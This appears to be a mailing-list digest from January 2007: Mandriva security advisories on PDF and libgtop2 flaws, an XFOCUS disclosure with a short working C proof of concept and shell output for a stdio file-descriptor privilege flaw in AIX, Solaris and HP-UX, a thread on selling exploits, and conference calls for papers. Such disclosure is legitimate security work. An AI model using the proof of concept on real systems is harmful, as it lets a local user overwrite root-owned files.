-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:020 http://www.mandriva.com/security/ ___ Package : poppler Date: January 18, 2007 Affected: 2007.0, Corporate 4.0 ___ Problem Description: The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2, kpdf in KDE before 3.5.5, and other products, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104 ___ Updated Packages: Mandriva Linux 2007.0: eb70627a3feb80e55c5416de909ee50f 2007.0/i586/libpoppler-qt1-0.5.3-5.1mdv2007.0.i586.rpm 05f4fdabb7ac15c2c64ef10d2cf1ce01 2007.0/i586/libpoppler-qt1-devel-0.5.3-5.1mdv2007.0.i586.rpm 82e9f658ed4d6f003360bd11c57205d6 2007.0/i586/libpoppler-qt4-1-0.5.3-5.1mdv2007.0.i586.rpm 308139cb289a588da234bebc5ee2e8ce 2007.0/i586/libpoppler-qt4-1-devel-0.5.3-5.1mdv2007.0.i586.rpm 5ced86af3b869c1ab8b87a3c0995e2e5 2007.0/i586/libpoppler1-0.5.3-5.1mdv2007.0.i586.rpm 2bf686d7807ebaa49677910fdeda7668 2007.0/i586/libpoppler1-devel-0.5.3-5.1mdv2007.0.i586.rpm 26ea24c7f6a2a6d745722b91b280c7f6 2007.0/i586/poppler-0.5.3-5.1mdv2007.0.i586.rpm 731b5b829fd6aaeb3783a5d1f8f52f0b 2007.0/SRPMS/poppler-0.5.3-5.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: bde2c75483abc11ce0e6ff7bc6a09765 2007.0/x86_64/lib64poppler-qt1-0.5.3-5.1mdv2007.0.x86_64.rpm eb79e6393f2a0efa08e82b80a39b3b53 2007.0/x86_64/lib64poppler-qt1-devel-0.5.3-5.1mdv2007.0.x86_64.rpm 97c845963b9838407a0979dfe8d0ac76 2007.0/x86_64/lib64poppler-qt4-1-0.5.3-5.1mdv2007.0.x86_64.rpm 1f1378914db5be7fc006ab20ab9e2dce 2007.0/x86_64/lib64poppler-qt4-1-devel-0.5.3-5.1mdv2007.0.x86_64.rpm b4d76885d56743966b4b5b5c15c9bcd8 2007.0/x86_64/lib64poppler1-0.5.3-5.1mdv2007.0.x86_64.rpm b0b9bb8ceddc704eed12ecaa1c702ac2 2007.0/x86_64/lib64poppler1-devel-0.5.3-5.1mdv2007.0.x86_64.rpm 255a700377cb2f3ccaf326f4710f5c73 2007.0/x86_64/poppler-0.5.3-5.1mdv2007.0.x86_64.rpm 731b5b829fd6aaeb3783a5d1f8f52f0b 2007.0/SRPMS/poppler-0.5.3-5.1mdv2007.0.src.rpm Corporate 4.0: b83edce168f16ac58d415d813e6535ef corporate/4.0/i586/libpoppler-qt0-0.4.1-3.3.20060mlcs4.i586.rpm 546a2b25600de3cd7b6054353342db68 corporate/4.0/i586/libpoppler-qt0-devel-0.4.1-3.3.20060mlcs4.i586.rpm f9e87ed14ed1d68179c14b81509e7a43 corporate/4.0/i586/libpoppler0-0.4.1-3.3.20060mlcs4.i586.rpm a1722f427ffef0a6261ac12d5ea5fec3 corporate/4.0/i586/libpoppler0-devel-0.4.1-3.3.20060mlcs4.i586.rpm 6ca08c4ca1461ed257c199bf5cc933bd corporate/4.0/SRPMS/poppler-0.4.1-3.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: ecc27ed3656481ada5e7433700bfeb08 corporate/4.0/x86_64/lib64poppler-qt0-0.4.1-3.3.20060mlcs4.x86_64.rpm 729a658bb8ad45ff5eacbd73d117d44d corporate/4.0/x86_64/lib64poppler-qt0-devel-0.4.1-3.3.20060mlcs4.x86_64.rpm 4f5cedb286abe05295d496f5efeb079e corporate/4.0/x86_64/lib64poppler0-0.4.1-3.3.20060mlcs4.x86_64.rpm c5c8f4443ac0a8fa05276a69d1939095 corporate/4.0/x86_64/lib64poppler0-devel-0.4.1-3.3.20060mlcs4.x86_64.rpm 6ca08c4ca1461ed257c199bf5cc933bd corporate/4.0/SRPMS/poppler-0.4.1-3.3.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFr7W5mqjQ0CJFipgRAhA8AKCoaZ84XQdz77iZtmJlQBOPFS6jkwCg6RYB agxEhY1K2xcqicCyFNklWpo= =QZMV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -
[Full-disclosure] [ MDKSA-2007:021 ] - Updated xpdf packages fix crafted pdf file vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:021 http://www.mandriva.com/security/ ___ Package : xpdf Date: January 18, 2007 Affected: 2007.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2, kpdf in KDE before 3.5.5, and other products, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104 ___ Updated Packages: Mandriva Linux 2007.0: e34f95bfcc5bee00a123ee84d9e14aba 2007.0/i586/xpdf-3.01pl2-3.1mdv2007.0.i586.rpm 9fbbb1a928599ec327501ea350b8871a 2007.0/i586/xpdf-tools-3.01pl2-3.1mdv2007.0.i586.rpm 19112d086453c2fdb928011fe6f7aa0c 2007.0/SRPMS/xpdf-3.01pl2-3.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 76e9749a053f7162c894741884c89835 2007.0/x86_64/xpdf-3.01pl2-3.1mdv2007.0.x86_64.rpm f20e65b356ec330fd60e095add93d04a 2007.0/x86_64/xpdf-tools-3.01pl2-3.1mdv2007.0.x86_64.rpm 19112d086453c2fdb928011fe6f7aa0c 2007.0/SRPMS/xpdf-3.01pl2-3.1mdv2007.0.src.rpm Corporate 3.0: 39a410e5887ddda80b0a2c4541082d50 corporate/3.0/i586/xpdf-3.00-5.9.C30mdk.i586.rpm d4e017b43f39e1dd0e3d8367c62633d2 corporate/3.0/SRPMS/xpdf-3.00-5.9.C30mdk.src.rpm Corporate 3.0/X86_64: e01a2822cf592a56d89a13b73b8fa133 corporate/3.0/x86_64/xpdf-3.00-5.9.C30mdk.x86_64.rpm d4e017b43f39e1dd0e3d8367c62633d2 corporate/3.0/SRPMS/xpdf-3.00-5.9.C30mdk.src.rpm Corporate 4.0: 9899a75731800c052d32a7e8cfceedf4 corporate/4.0/i586/xpdf-3.01-1.3.20060mlcs4.i586.rpm 0c9969ce74ae66d95ff902181f83e0e5 corporate/4.0/SRPMS/xpdf-3.01-1.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 5d2343239f0e46efa4df3c81a0c14191 corporate/4.0/x86_64/xpdf-3.01-1.3.20060mlcs4.x86_64.rpm 0c9969ce74ae66d95ff902181f83e0e5 corporate/4.0/SRPMS/xpdf-3.01-1.3.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFr7Y6mqjQ0CJFipgRAlm4AKDovSG9ZcNC+0wPIkPbAeKFjiO1GgCfVdtX 8bsgpC4xTvUU6p70qCB5ffU= =4Q/3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:022 ] - Updated tetex packages fix crafted pdf file vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:022 http://www.mandriva.com/security/ ___ Package : tetex Date: January 18, 2007 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2, kpdf in KDE before 3.5.5, and other products, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104 ___ Updated Packages: Mandriva Linux 2006.0: b0e9b86776c418b948d8574d5d9cbd49 2006.0/i586/jadetex-3.12-110.3.20060mdk.i586.rpm c2338788f1ab57520c0082392ed79a4d 2006.0/i586/tetex-3.0-12.3.20060mdk.i586.rpm 23f6c5d99c6d75d8299858f2f1762570 2006.0/i586/tetex-afm-3.0-12.3.20060mdk.i586.rpm 38ce0c5b942ecbbeecbeb2e67b0fc575 2006.0/i586/tetex-context-3.0-12.3.20060mdk.i586.rpm fae0147ac3122354c573418a5e2b933e 2006.0/i586/tetex-devel-3.0-12.3.20060mdk.i586.rpm 4ea3b6d4bac953feacdafec3b0716a75 2006.0/i586/tetex-doc-3.0-12.3.20060mdk.i586.rpm 3cea7fdbe482dba0fdccb423e59c0687 2006.0/i586/tetex-dvilj-3.0-12.3.20060mdk.i586.rpm de6a3d7a548c55476ac8ffbce57867f2 2006.0/i586/tetex-dvipdfm-3.0-12.3.20060mdk.i586.rpm 394aaf123e290414c429c0e83e007928 2006.0/i586/tetex-dvips-3.0-12.3.20060mdk.i586.rpm e7e1826411e5a655c13381bf8f8a836e 2006.0/i586/tetex-latex-3.0-12.3.20060mdk.i586.rpm 7a7304b0ff04cb5528b44ec4116dab00 2006.0/i586/tetex-mfwin-3.0-12.3.20060mdk.i586.rpm 478e42a89808a7a50de49d5824981961 2006.0/i586/tetex-texi2html-3.0-12.3.20060mdk.i586.rpm 9f2641d71a55e2ca887a43ef4965b32b 2006.0/i586/tetex-xdvi-3.0-12.3.20060mdk.i586.rpm d5b7ff7afc8bf10f923d198b12a2eef7 2006.0/i586/xmltex-1.9-58.3.20060mdk.i586.rpm dfac4ea9ee368da19133c7ec734f4df9 2006.0/SRPMS/tetex-3.0-12.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 9ef912b94f8f55197ddbb2123e30a25a 2006.0/x86_64/jadetex-3.12-110.3.20060mdk.x86_64.rpm 1c01bcd9a4fa2982694492210de47089 2006.0/x86_64/tetex-3.0-12.3.20060mdk.x86_64.rpm 4d00faf564d28b45374a57f91e5aacb9 2006.0/x86_64/tetex-afm-3.0-12.3.20060mdk.x86_64.rpm 139a0ee822471c2562eab654142f34f4 2006.0/x86_64/tetex-context-3.0-12.3.20060mdk.x86_64.rpm 5dbf547b972213623d879c201eaf7d26 2006.0/x86_64/tetex-devel-3.0-12.3.20060mdk.x86_64.rpm 8080633d08582fac2b2b2084e0e1c14e 2006.0/x86_64/tetex-doc-3.0-12.3.20060mdk.x86_64.rpm eea2f40c602d83eab0abcf01065c9e27 2006.0/x86_64/tetex-dvilj-3.0-12.3.20060mdk.x86_64.rpm 93a9c2c81cebe89e71c386cb122684ca 2006.0/x86_64/tetex-dvipdfm-3.0-12.3.20060mdk.x86_64.rpm f370373047439ff20285c560c62d15bb 2006.0/x86_64/tetex-dvips-3.0-12.3.20060mdk.x86_64.rpm aac948de1110ed6cd6bec349185c469e 2006.0/x86_64/tetex-latex-3.0-12.3.20060mdk.x86_64.rpm ad1b17cdaaeaddcb50ccecca995b40bf 2006.0/x86_64/tetex-mfwin-3.0-12.3.20060mdk.x86_64.rpm e0a894fef728129a9c4adaf489b2d4c9 2006.0/x86_64/tetex-texi2html-3.0-12.3.20060mdk.x86_64.rpm 7be9509ba2bae53fd5e5dad6726319c8 2006.0/x86_64/tetex-xdvi-3.0-12.3.20060mdk.x86_64.rpm dac1e6dbb15c0720ddee363e1fca40c8 2006.0/x86_64/xmltex-1.9-58.3.20060mdk.x86_64.rpm dfac4ea9ee368da19133c7ec734f4df9 2006.0/SRPMS/tetex-3.0-12.3.20060mdk.src.rpm Mandriva Linux 2007.0: 78124b41f0f99ef02b030db387b7d0be 2007.0/i586/jadetex-3.12-116.1mdv2007.0.i586.rpm 0ba38db61f2ac0cfca4017d5a421c371 2007.0/i586/tetex-3.0-18.1mdv2007.0.i586.rpm ac07abe40f118a50d4d02480e6fc6acf 2007.0/i586/tetex-afm-3.0-18.1mdv2007.0.i586.rpm 9b2cc8802dbbd9987fc8e27fc2cd4fa6 2007.0/i586/tetex-context-3.0-18.1mdv2007.0.i586.rpm 26bf31a911285913987b47d84ab972e6 2007.0/i586/tetex-devel-3.0-18.1mdv2007.0.i586.rpm 64548fd5d941e14ad9040b0682be073f 2007.0/i586/tetex-doc-3.0-18.1mdv2007.0.i586.rpm 327b14eb8a8e906b3c671dd2550e23c6 2007.0/i586/tetex-dvilj-3.0-18.1mdv2007.0.i586.rpm c10d7f14ac918ecf1346c5602e4702b1 2007.0/i586/tetex-dvipdfm-3.0-18.1mdv2007.0.i586.rpm 991f7f24ce100c5b1bd650635df534a6 2007.0/i586/tetex-dvips-3.0-18.1mdv2007.0.i586.rpm 55c23ef379b549f3bf295d7f22eedd3d 2007.0/i586/tetex-latex-3.0-18.1mdv2007.0.i586.rpm 910a0ab053d49d72beba7dbb8dcfb67d 2007.0/i586/tetex-mfwin-3.0-18.1mdv2007.0.i586.rpm d4d79d3ec2e942950a900b0e264dd352 2007.0/i586/tetex-texi2html-3.0-18.1mdv2007.0.i586.rpm
[Full-disclosure] Multiple OS kernel insecure handling of stdio file descriptor
XFOCUS team (http://www.xfocus.org/) had discovered Multiple OS kernel
insecure handling of stdio file descriptor.
===
Affected OS Version
AIX 5.3
Solaris 9
HPUX B11.11
(maybe other version,we did not tested)
===
Description
The affected OSes allows local users to write to or read from restricted
files by closing the file descriptors 0 (standard input), 1 (standard
output), or 2 (standard error), which may then be reused by a called
setuid process that intended to perform I/O on normal files. the attack
which exploit this vulnerability possibly get root right.
POC
-bash-3.00$ oslevel -r
5300-03
-bash-3.00$ ls -l bb
-rw-r--r-- 1 root system0 12月05 20时34 bb
-bash-3.00$ ls -l k
-rwxr-xr-x 1 root system58242 12月03 23时13 k
-bash-3.00$ ls -l tt
-rwsr-xr-x 1 root system59096 12月03 23时14 tt (this is a
suid program,called by k)
-bash-3.00$ cat k.c
int main()
{
close(2); //close 2 before call tt
execl(./tt,./tt,0);
}
-bash-3.00$ cat tt.c
int main()
{
printf(euid=%i\n,geteuid());
int f=open(/tmp/bb,1);
printf(f=%i\n,f);
write(2,hello\n,6);
}
-bash-3.00$ id
uid=202(cloud) gid=1(staff)
-bash-3.00$ ./k
euid=0
f=2 #err info wrote into bb file
-bash-3.00$ ls -l bb
-rw-r--r-- 1 root system6 12月05 20时35 bb
=
Time Line
2005-12-xx Discover this vulnerability
2006-12-12 Initial vendor notifiation
2006-12-12 HP responses ,assgin to SSRT061287;
Sun responses but mistake this vulnerablitily as
application bug and hope us figoure out real attack
vector;
Aix no responses;
2007-01-18 public disclosure
--
Kind Regards,
---
XFOCUS Security Team
http://www.xfocus.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Multiple OS kernel insecure handling of stdio file descriptor
Dear XFOCUS Security Team, A more complicated variant of this vulnerability (exhausting all available descriptors and closing standard one) was reported by Joost Pol for BSD systems. It's very funny to see commercial Unix variants were not checked against it and simplest variant of this attack was not fixed for 5 years. See: http://security.nnov.ru/news1956.html --Thursday, January 18, 2007, 5:21:52 PM, you wrote to full-disclosure@lists.grok.org.uk: XST The affected OSes allows local users to write to or read from restricted XST files by closing the file descriptors 0 (standard input), 1 (standard XST output), or 2 (standard error), which may then be reused by a called XST setuid process that intended to perform I/O on normal files. the attack XST which exploit this vulnerability possibly get root right. -- ~/ZARAZA http://security.nnov.ru/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Roman, It depends on the needs and requirements of the buyer. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Oh, About your ROI question, that varies per buyer. I am not usually told about why a buyer needs something as that's none of my business. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:023 ] - Updated libgtop2 packages fix buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:023 http://www.mandriva.com/security/ ___ Package : libgtop2 Date: January 18, 2007 Affected: 2007.0 ___ Problem Description: Stack-based buffer overflow in the glibtop_get_proc_map_s function in libgtop before 2.14.6 (libgtop2) allows local users to cause a denial of service (crash) and possibly execute arbitrary code via a process with a long filename that is mapped in its address space, which triggers the overflow in gnome-system-monitor. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0235 ___ Updated Packages: Mandriva Linux 2007.0: 9a42ece573e6285e548d3611d905962b 2007.0/i586/libgtop2-2.14.3-1.1mdv2007.0.i586.rpm 015d57a79518ea22832f6fbda39271a2 2007.0/i586/libgtop2.0_7-2.14.3-1.1mdv2007.0.i586.rpm 90c71d829f0ecf9a190cd6f883d7641d 2007.0/i586/libgtop2.0_7-devel-2.14.3-1.1mdv2007.0.i586.rpm d814d8ae476947ff129624b4bbf3c468 2007.0/SRPMS/libgtop2-2.14.3-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 6c29e33986f8edcb030c51c2a3f11284 2007.0/x86_64/lib64gtop2.0_7-2.14.3-1.1mdv2007.0.x86_64.rpm 7686a3045392d92d1f8a0e3e481b2172 2007.0/x86_64/lib64gtop2.0_7-devel-2.14.3-1.1mdv2007.0.x86_64.rpm fd1b70ddc81ee08e70661710883255d5 2007.0/x86_64/libgtop2-2.14.3-1.1mdv2007.0.x86_64.rpm d814d8ae476947ff129624b4bbf3c468 2007.0/SRPMS/libgtop2-2.14.3-1.1mdv2007.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFr8rTmqjQ0CJFipgRAgD7AJ9B68ksXN1Igw3gbiANW6EiWs/UxwCgsCUs 6JCAEa4WflSQgpWuMNP3x48= =0z2K -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] EUSecWest 2007 Papers
Hi, For those who asked, we are still processing the submissions for CanSecWest and the call closed, please stand by. The paper selections are back from the reviewers for EUSecWest, in London on March 1-2. In absolutely random order: Threats against and protection of Microsoft's internal network - Greg Galford, Microsoft Linux Kernel == Security Nightmare - Marcel Holtmann, Red Hat /GS and ASLR in Windows Vista - Ollie Whitehouse, Symantec Fuzzing: history, perspectives and limits - Christian Wieser, Oulu university The new OWASP Web Application Penetration Testing Methodology - Matteo Meucci Alberto Revelli, OWASP-Italy Reverse Engineering Malicious Javascript - Jose Nazario, Ph.D., Arbor Bypassing NAC Systems - Ofir Arkin, Insightix RFID - Adam Laurie, trifinite Protecting Next-Gen Networks @ Nx10G link sizes - Jim Deleskie, Teleglobe Video Conferencing Security - Navid Jam, Sandia National Laboratories Software Virtualization Based Rootkits - Sun Bing VoIP Attacks! - Dustin D. Trammell, TippingPoint Windows Vista Exploitation Countermeasures - Richard Johnston, Microsoft OSX Security - Daniel Cuthbert, Corsaire Distributed drone-based malware propagation and deployment automation - Emmanuel H We have added a new RFID dojo in London with Adam, and Nico has a new VoIP Security dojo amongst the new dojos to be announced for CanSecWest along with the paper selections. Dojos for London have final schedules now. cheers, --dr -- World Security Pros. Cutting Edge Training, Tools, and Techniques London, U.K.Mar 1-2 - 2007http://eusecwest.com pgpkey http://dragos.com/ kyxpgp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DIMVA 2007: Final Call for Papers
Dear Colleagues, this is the final Call for Papers for DIMVA 2007, the Fourth GI International Conference on Detection of Intrusions Malware, and Vulnerability Assessment; which will be held in Lucerne, Switzerland, on July 12-13, 2007. Paper submission is now open at http://www.dimva.org/dimva2007. We invite submissions of regular papers and short papers. The deadline for both types of submissions is February 9, 2007. Please feel free to distribute this announcement. We apologize if you receive multiple copies of this message. Best Regards, The DIMVA 2007 Organizing Committee --- CALL FOR PAPERS DIMVA 2007 Fourth GI International Conference on Detection of Intrusions Malware, and Vulnerability Assessment Organized by the GI Special Interest Group SIDAR In Cooperation with IEEE Computer Society Task Force on Information Assurance Lucerne, Switzerland July 12 - 13, 2007 http://www.dimva.org/dimva2007 mailto:[EMAIL PROTECTED] --- The annual DIMVA conference serves as a premier forum for advancing the state of the art in intrusion detection, malware detection, and vulnerability assessment. Each year DIMVA brings together international experts from academia, industry and government to present and discuss novel research in these areas. DIMVA is organized by the special interest group Security - Intrusion Detection and Response of the German Informatics Society (GI). The conference proceedings will appear in Springer's Lecture Notes in Computer Science (LNCS) series. DIMVA solicits submission of high-quality, original scientific work. This year we invite two types of paper submissions: - Full papers, presenting novel and mature research results. Full papers are limited to 20 pages, prepared according to the instructions provided below. They will be reviewed by the program committee, and papers accepted for presentation at the conference will be included in the proceedings. - Short papers (extended abstracts), presenting original, still ongoing work that has not yet reached the maturity required for a full paper. Short papers are limited to 10 pages, prepared according to the instructions provided below. They will also be reviewed by the program committee, and papers accepted for presentation at the conference will be included in the proceedings (containing Extended Abstract in the title). DIMVA's scope includes, but is not restricted to the following areas: - Intrusion Detection * Approaches * Implementations * Prevention and response * Result correlation * Evaluation * Potentials and limitations * Operational experiences * Evasion and other attacks * Legal and social aspects - Malware * Techniques * Detection * Prevention * Evaluation * Trends and upcoming risks * Forensics and recovery - Vulnerability Assessment * Vulnerabilities * Vulnerability detection * Vulnerability prevention DIMVA particularly encourages papers that discuss the integration of intrusion, malware, and vulnerability detection in large-scale operational communication networks. ORGANIZING COMMITTEE General Chair: Bernhard Hämmerli, HTA Luzern [EMAIL PROTECTED] Program Chair: Robin Sommer, LBNL/ICSI [EMAIL PROTECTED] Sponsor Chair: Dirk Schadt [EMAIL PROTECTED] PROGRAM COMMITTEE - Roland Büschkes, RWE (DE) Weidong Cui, Microsoft Research (US) Marc Dacier, Eurécom (FR) Hervé Debar, France Télécom (FR) Sven Dietrich, Carnegie Mellon University (US) Toralv Dirro, McAfee (DE) Holger Dreger, Siemens CERT (DE) Mohamed Eltoweissy, Virginia Tech (US) Ulrich Flegel, University of Dortmund (DE) Felix C. Freiling, University of Mannheim (DE) Dirk Häger, BSI (DE) Bernhard Hämmerli, HTA Lucerne (CH) Marc Heuse, n.runs (DE) Ming-Yuh Huang, Boeing (US) Erland Jonsson, Chalmers University (SE) Klaus Julisch, IBM Research (US) Angelos Keromytis, Columbia University (US) Hartmut König, BTU Cottbus (DE) Christian Kreibich, ICSI (US) Christopher Kruegel, TU Vienna (AT) Pavel Laskov, Fraunhofer FIRST (DE) Wenke Lee, Georgia Tech (US) Jun Li, Tsinghua University (CN) Javier Lopez, University of Malaga (ES) John McHugh, Dalhousie University (CA) Michael Meier, University of Dortmund (DE) R. Sekar, Stony Brook University (US) Roberto Setola, Univ. CAMPUS Bio-Medico Rome (IT) Doug Tygar, UC Berkeley (US) Giovanni Vigna, UC Santa Barbara (US) Stephen Wolthusen, University of London (GB) S. Felix Wu, UC Davis (US) IMPORTANT DATES --- February 9, 2007
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Then you cannot assure that your buyer will make an ethical use of the exploit. So what's the real difference against selling it to another people (known or unknown, where unknown could be black-hats, script-kiddies or whoever making the higher bid)? The receipt? :) I mean, if I (as a researcher) don't mind what the exploit will be used for, I'd simply look for the higher bidder (I guess). And you didn't really answer my former two questions... Please, could you provide some specific examples of typical ways to justify ROI? Which is the typical profile/s of enterprise/s buying exploits? (without naming particular enterprises, of course). Simon Smith escribió: Oh, About your ROI question, that varies per buyer. I am not usually told about why a buyer needs something as that's none of my business. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Saludos, -Roman PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
